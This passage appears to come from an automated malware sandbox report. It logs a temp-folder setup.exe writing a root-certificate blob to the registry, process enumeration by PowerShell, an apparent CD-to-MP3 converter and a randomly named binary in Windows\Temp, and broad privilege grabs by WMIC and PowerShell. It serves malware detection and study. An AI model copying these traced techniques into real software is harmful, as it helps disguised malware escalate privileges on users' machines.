Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
